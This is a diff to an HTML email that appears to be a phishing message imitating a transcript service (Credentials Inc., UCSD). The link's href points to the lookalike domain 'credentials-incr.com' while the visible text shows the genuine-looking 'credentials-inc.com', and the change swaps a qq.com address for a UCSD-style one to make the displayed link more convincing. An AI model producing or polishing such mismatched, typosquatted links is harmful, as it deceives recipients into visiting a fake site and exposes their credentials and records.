--- a/part1.html
+++ b/part1.html
@@ -368,7 +368,7 @@
                                                         does not work, please cut and paste the following URL into your
                                                         browser:<br /><a
                                                             href="http://www.credentials-incr.com/CGI-BIN/PDFCGI2.html?LOGONP1H87515111adm-etranscripts@ucsd.edu"
-                                                            target="_blank">https://www.credentials-inc.com/CGI-BIN/PDFCGI2.pgm?LOGONP1H87515111609668309@qq.com</a></small>
+                                                            target="_blank">https://www.credentials-inc.com/CGI-BIN/PDFCGI2.pgm?LOGONP1H87515111adm-etranscripts@ucsd.com</a></small>
                                                 </td>
                                             </tr>
                                             <tr>
